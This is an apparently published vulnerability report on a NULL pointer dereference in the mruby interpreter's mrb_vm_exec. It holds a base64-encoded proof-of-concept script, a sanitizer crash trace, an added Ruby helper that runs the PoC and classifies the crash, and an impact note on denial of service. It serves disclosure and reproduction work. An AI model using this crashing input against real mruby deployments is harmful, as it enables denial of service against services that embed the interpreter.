NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Mar 7th 2022
Description
There is a NULL pointer dereference in mrb_vm_exec (vm.c:1929). The bug was reproduced on the latest mruby commit at the time of reporting (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04, x86_64/amd64.
Proof of Concept
1- Clone the repo and build with ASan: MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Use the resulting mruby binary to execute the PoC (it is base64-encoded here since it contains unprintable characters):
$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
#0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
#1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
#2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
#3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
#4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
#5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
#6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING
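The following reproduction helper is an added example and is not part of the original report or of the mruby project. It decodes the base64 PoC given above (the string is copied verbatim from the report), writes it to a temporary file, runs it under an mruby binary and classifies the outcome, so the crash can be checked on other commits or builds without re-typing the shell steps. The default binary location build/host/bin/mruby (where rake places the binary in a checkout, as in the report's trace) and the MRUBY_BIN environment variable are assumptions about your setup.

```ruby
# Added reproduction helper for the mruby NULL pointer dereference report.
# Not the report's own code: it decodes the PoC from the report, runs it
# under mruby, and tells a sanitizer/segfault crash apart from a clean run.
require 'base64'
require 'open3'
require 'tmpdir'

# Verbatim from the report (the three wrapped lines joined; base64 -d ignores
# the newlines the original echo -ne emitted, so this is the same payload).
POC_B64 = 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0' \
          'e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs' \
          'MCwwLDAsMCwwKX19fQ=='

# Assumption: the ASan build from step 1 lives at build/host/bin/mruby in the
# current directory unless MRUBY_BIN says otherwise.
DEFAULT_MRUBY_BIN = ENV.fetch('MRUBY_BIN', 'build/host/bin/mruby')

# Returns the PoC as the mruby source text the reporter encoded.
def decode_poc(b64 = POC_B64)
  Base64.decode64(b64)
end

# Runs the PoC under the given mruby binary. Returns a Hash:
#   status:   :no_binary | :crash | :clean
#   signal:   terminating signal number if the process died from one (SIGSEGV
#             without sanitizers), nil otherwise
#   sanitizer: true if ASan/UBSan reported (ASan exits with status 1 after
#             printing its report rather than re-raising the signal)
#   stderr:   captured stderr, useful for the sanitizer stack trace
def run_poc(mruby_bin = DEFAULT_MRUBY_BIN, source = decode_poc)
  return { status: :no_binary, signal: nil, sanitizer: false, stderr: '' } unless File.executable?(mruby_bin)

  Dir.mktmpdir do |dir|
    path = File.join(dir, 'poc')
    File.binwrite(path, source)              # binwrite: keep bytes exactly as decoded
    _out, err, st = Open3.capture3(mruby_bin, path)
    sanitizer = err.match?(/AddressSanitizer|UndefinedBehaviorSanitizer/)
    crashed = st.signaled? || sanitizer
    { status: crashed ? :crash : :clean,
      signal: st.termsig,
      sanitizer: sanitizer,
      stderr: err }
  end
end

if __FILE__ == $0
  puts decode_poc
  result = run_poc
  puts "mruby: #{DEFAULT_MRUBY_BIN} -> #{result[:status]}"
  puts result[:stderr] if result[:status] == :crash
end
```

Run it from the top of the mruby checkout after the ASan build (or point MRUBY_BIN at any other mruby binary). A `:crash` with `sanitizer: true` reproduces the trace above; a `:crash` with `signal: 11` is the same bug on a non-sanitized build; `:clean` on a later commit indicates the path has been fixed or the PoC no longer reaches it.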
Impact
This vulnerability lets anyone who can feed a script to the mruby interpreter crash it, i.e. a denial of service against the interpreter and anything that embeds it. Note that the sanitizer output shows the dereferenced struct RArray pointer is 0x1, with the faulting read at 0x11 in the zero page, rather than a literal NULL: a value that is not a valid object pointer is being treated as an RArray. This is consistent with a boxed integer 0 (encoded as 0x1 under mruby's word boxing) reaching a code path that expects an array, but that is an inference from the trace, not something the report establishes. Without ASan/UBSan the same read is an unhandled SIGSEGV.
Acknowledgements
This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.
Status: We are processing your report and will contact the mruby team within 24 hours. (a year ago)
Status: We have contacted a member of the mruby team and are waiting to hear back. (a year ago)